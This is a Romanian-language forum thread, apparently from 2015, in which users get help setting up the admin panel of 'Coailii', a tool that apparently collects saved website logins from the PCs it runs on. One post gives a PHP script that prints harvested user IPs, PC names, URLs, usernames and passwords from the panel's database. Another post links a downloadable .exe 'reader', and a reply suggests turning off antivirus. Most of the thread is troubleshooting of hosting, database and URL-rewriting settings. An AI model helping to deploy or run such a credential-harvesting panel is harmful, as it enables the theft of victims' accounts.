WindyZone Posted August 18, 2015 Report Share Posted August 18, 2015 (edited) Mie mi-a mers totul aproape din prima, dar nu si partea cu api. Nu inteleg , ce trebuie sa fac cu el ?Cum fac sa apara ? Ma incurc la chestiile simple.. Edited August 18, 2015 by WindyZone Quote Link to comment Share on other sites More sharing options...
kNigHt Posted August 18, 2015 Author Report Share Posted August 18, 2015 Mie mi-a mers totul aproape din prima, dar nu si partea cu api. Nu inteleg , ce trebuie sa fac cu el ?Cum fac sa apara ? Ma incurc la chestiile simple..Citeste cu atentie instructiunile si tot thread-ul asta, daca este cazul, si iti vei da seama Quote Link to comment Share on other sites More sharing options...
luca123 Posted August 18, 2015 Report Share Posted August 18, 2015 Salut,Am o intrebare,daca serverul este executat pe un pc si trimite datele care sunt salvate,de ce dupa ce imi fac un alt cont pe un x site si "execut" din nou serverul nu imi mai trimite datele?Va multumescpentru ca e alt site Quote Link to comment Share on other sites More sharing options...
.Breacker Posted September 12, 2015 Report Share Posted September 12, 2015 (edited) Am f?cut un script PHP pentru a v? u?ura munca din phpMyAdmin cu export.Dac? ?ti?i s? instala?i panel-ul, sunt sigur c? ?i acest script e u?or de configurat cu baza de date, utilizator ?i parol?.Trebuie s? ave?i Remote phpMyAdmin activat. ( Op?ional. Doar pentru alte site-uri decat cel pe care ave?i PHP Panel-ul instalat.) COAILII Get Data from MySQL - Pastebin.com[/url][PHP]<html> <title> COAILII Get Data from MySQL</title> </html><?php $databasebhost = '127.0.0.1'; $databaseuser = 'user'; $databasepass = '12345678'; $connect = mysql_connect($databasehost, $databaseuser, $databasepass); if(! $connect ) { die('Could not connect: ' . mysql_error()); } $sql = 'SELECT id_data, id_application, user_ip, pc_name, url, username, password, registration_time FROM coailii_data'; mysql_select_db('baza ta de date'); $retval = mysql_query( $sql, $connect ); if(! $retval ) { die('Could not get data: ' . mysql_error()); } while($row = mysql_fetch_array($retval, MYSQL_ASSOC)) { echo "NUMBER: # {$row['id_data']} <br>". "APPLICATION: {$row['id_application']} <br>". "USER-IP: {$row['user_ip']} <br>". "PC-NAME: {$row['pc_name']} <br>". "URL: {$row['url']} <br> ". "USERNAME: {$row['username']} <br> ". "PASSWORD: {$row['password']} <br> ". "TIME: {$row['registration_time']} <br> ". "------------------------------------------------------------<br>"; } echo "Coailii Data Loaded!"; mysql_close($connect);?> Edited September 13, 2015 by .Breacker Quote Link to comment Share on other sites More sharing options...
Angrry Posted September 14, 2015 Report Share Posted September 14, 2015 (edited) Am facut un program cu care sa luati mai usor datele din baza de date pentru Coailii. Setup: http://www.angrrylab.net/files/Coailii%20Database%20Reader%20Setup.exeSugerez sa rulati programul ca administrator pentru a salva fisierul. Edited September 14, 2015 by Angrry 1 Quote Link to comment Share on other sites More sharing options...
askwrite Posted September 14, 2015 Report Share Posted September 14, 2015 Am facut un program cu care sa luati mai usor datele din baza de date pentru Coailii. Setup: http://www.angrrylab.net/files/Coailii%20Database%20Reader%20Setup.exeSugerez sa rulati programul ca administrator pentru a salva fisierul.sugerez sa dezactivati antivirusul Quote Link to comment Share on other sites More sharing options...
zoondark Posted September 15, 2015 Report Share Posted September 15, 2015 Admin Panel-ul nu are optiune sa sterg log-urile care nu-mi folosesc? Quote Link to comment Share on other sites More sharing options...
kNigHt Posted September 15, 2015 Author Report Share Posted September 15, 2015 Admin Panel-ul nu are optiune sa sterg log-urile care nu-mi folosesc?Salut @zoondark,Din pacate nu are, insa va avea in noua versiune. Feature-ul este deja facut, trebuie sa ma mai ocup de cateva alte detalii, apoi voi lansa codul updated. 1 Quote Link to comment Share on other sites More sharing options...
Platon666 Posted September 24, 2015 Report Share Posted September 24, 2015 (edited) "Din pacate nu are, insa va avea in noua versiune. Feature-ul este deja facut, trebuie sa ma mai ocup de cateva alte detalii, apoi voi lansa codul updated. "It is waiting for an update from the admin panel function delete log files)Thanks for your work. Edited September 24, 2015 by Platon666 Quote Link to comment Share on other sites More sharing options...
redxxx Posted October 4, 2015 Report Share Posted October 4, 2015 The page has not been found.ce am gresit? Quote Link to comment Share on other sites More sharing options...
kNigHt Posted October 24, 2015 Author Report Share Posted October 24, 2015 Small update to Coailii:- Added delete feature- Several bugfixesHave fun Quote Link to comment Share on other sites More sharing options...
kNigHt Posted October 24, 2015 Author Report Share Posted October 24, 2015 The page has not been found.ce am gresit?Verifica daca ai apache2 ca webserver si URL rewriting activat. Quote Link to comment Share on other sites More sharing options...
Platon666 Posted October 30, 2015 Report Share Posted October 30, 2015 Thank you for the update panel.The Delete button is very useful) Quote Link to comment Share on other sites More sharing options...
kNigHt Posted October 31, 2015 Author Report Share Posted October 31, 2015 Thank you for the update panel.The Delete button is very useful)You welcome Quote Link to comment Share on other sites More sharing options...
zombynebunu Posted November 21, 2015 Report Share Posted November 21, 2015 (edited) @kNigHt : Cu ce am gresit ????? Pur si simplu nu ii dau de cap Screenshot by LightshotScreenshot by LightshotScreenshot by LightshotScreenshot by LightshotScreenshot by Lightshothttp://prntscr.com/958c8fhttp://prntscr.com/958cbhhttp://prntscr.com/958d6y Edited November 21, 2015 by zombynebunu Quote Link to comment Share on other sites More sharing options...
kasmir Posted November 21, 2015 Report Share Posted November 21, 2015 @zombynebunuIntra in index.php si schimba pe linia 6:define('DEVELOPMENT', false);cu:define('DEVELOPMENT', true);Si spune-mi ce iti arata.Si renunta la XP lol o.O Quote Link to comment Share on other sites More sharing options...
zombynebunu Posted November 21, 2015 Report Share Posted November 21, 2015 @kasmir Asa o aveam:(<?php/** * © kNigHt @ rstforums.com */define('DEVELOPMENT', true);define('DS', DIRECTORY_SEPARATOR);define('ROOT', dirname(__FILE__));define('APPLICATION', ROOT . DS . 'application');define('VENDOR', ROOT . DS . 'vendor');require_once VENDOR . DS . 'autoload.php';\Feather\Feather\Core::init(); Quote Link to comment Share on other sites More sharing options...
kasmir Posted November 21, 2015 Report Share Posted November 21, 2015 Screenshot by Lightshot 'base_path' => '/',vezi daca iti merge Quote Link to comment Share on other sites More sharing options...
zombynebunu Posted November 21, 2015 Report Share Posted November 21, 2015 @kasmirThe page has not been found.<?phpreturn array( 'domain' => 'petros.890m.com', 'base_path' => '/', 'use_ssl' => false); Quote Link to comment Share on other sites More sharing options...
kasmir Posted November 21, 2015 Report Share Posted November 21, 2015 @kasmirThe page has not been found.<?phpreturn array( 'domain' => 'petros.890m.com', 'base_path' => '/', 'use_ssl' => false);incearca sa creezi un folder, poate reusesti asa.. ai incercat pe alt hosting? Quote Link to comment Share on other sites More sharing options...
zombynebunu Posted November 22, 2015 Report Share Posted November 22, 2015 Nu ii dau de cap deloc. Am incercat si pe G?zduire web gratuit? f?r? reclame cu suport PHP, MySQL ?i website builder. si pe https://byet.host si nu am reusit.Daca vrea sa imi intre prin teamviewer in calc sa vada care e trb as fi mai bine. Quote Link to comment Share on other sites More sharing options...
zombynebunu Posted November 22, 2015 Report Share Posted November 22, 2015 Am rezolvat ms mult @kasmir Quote Link to comment Share on other sites More sharing options...
_UnknowN Posted November 25, 2015 Report Share Posted November 25, 2015 Ma ajuta si pe mine cineva va rog frumos?Am facut host pe hostinger.ro dar nu stiu ce sa fac mai departe.. Quote Link to comment Share on other sites More sharing options...
_UnknowN Posted November 25, 2015 Report Share Posted November 25, 2015 Screenshot by Lightshot ajutor? Quote Link to comment Share on other sites More sharing options...
kasmir Posted November 26, 2015 Report Share Posted November 26, 2015 Screenshot by Lightshot ajutor?Pw pt db este gresita! Quote Link to comment Share on other sites More sharing options...